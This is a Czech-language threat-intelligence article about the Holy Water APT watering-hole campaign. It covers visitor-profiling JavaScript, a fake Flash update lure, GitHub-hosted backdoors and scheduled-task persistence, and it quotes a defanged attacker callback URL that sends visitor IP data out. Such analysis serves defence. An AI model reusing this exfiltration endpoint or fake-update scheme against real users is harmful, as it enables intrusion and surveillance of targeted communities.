Svatá voda APT

Holy Water APT je název pro skupinu kyberzločinců, kteří provedli sérii útoků typu vodní díry proti asijské náboženské a etnické skupině. TTP (taktiky, techniky a postupy) tohoto konkrétního útoku nelze připsat žádnému z již známých aktérů ATP (Advanced Persistent Threat), což vedlo výzkumníky k závěru, že se jedná o novou skupinu kyberzločinců, která vykazuje vlastnosti malý a flexibilní tým hackerů.

K provedení útoku na vodní díru se zločinci zaměří na několik webových stránek, které určené cíle často navštěvují. Stránky mohou patřit organizacím, charitativním organizacím nebo vlivným jednotlivcům, kteří patří do cílové skupiny. Všechny webové stránky kompromitované Holy Water byly hostovány na stejném serveru a zahrnovaly mimo jiné náboženskou osobnost, charitu, program dobrovolných služeb a organizaci spravedlivého obchodu.

Útok zahrnoval několik fází

Při návštěvě kompromitované webové stránky uživatel vstoupí do první fáze útoku, která se skládá z poškozeného JavaScriptu s názvem (script|jquery)-css.js a zatemněného Sojsonem, čínskou webovou službou. Úlohou tohoto skriptu je určit, zda je uživatel platným cílem, a za tímto účelem začne datová část sbírat data o návštěvníkovi a odesílat je na externí server na loginwebmailnic.dynssl[.]com prostřednictvím požadavků HTTP GET:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

Odpověď ze serveru vrátí výsledek true nebo false, a pokud je hodnota pravdivá, spustí se další fáze útoku; jinak se nic neděje.

Během druhého kroku JavaScript pojmenovaný (script|jquery)-file.js, který je opět zamlžován stejným způsobem. Tentokrát však hackeři použili Sojson v5 místo v4. K infikování uživatele nevyužívá Holy Water APT žádné zranitelnosti nebo slabiny softwaru. Místo toho se vygeneruje vyskakovací okno s nabídkou aktualizace přehrávače Flash a potenciální oběť musí souhlasit se stažením souboru.

Arsenal malwarových nástrojů Holy Water APT byl hostován na GitHubu

Pokud uživatel povolí pokračování falešné aktualizace Flash, připojí se k již neaktivnímu úložišti GitHub na adrese github.com/AdobeFlash32/FlashUpdate . Na tomto místě byly uloženy čtyři různé sady nástrojů – instalační balíček, backdoor malware pojmenovaný výzkumníky Godlike12 a dvě verze open-source backdoor Python známého jako Stitch , které hackeři upravili s rozšířenou funkčností. Aktualizační balíček je instalační program NSIS, který odstraní legitimní instalační program Windows Flash Player a nástroj stager, který se používá k načtení skutečného obsahu. Backdoor Godlike12 je napsán v jazyce Go a používá se k implementaci kanálu Disku Google na servery Command and Control (C&C, C2). Pokud jde o varianty zadních vrátek Stitch, kromě obvyklých činností zadních vrátek, jako je shromažďování informací a hesel, protokolování aktivit, stahování souborů atd., přidala skupina Holy Water možnost stáhnout si legitimní instalační program Adobe Flash pro automatickou aktualizaci z ubntrooters.serveuser.com a dosáhnout vytrvalosti využitím naplánovaných úloh.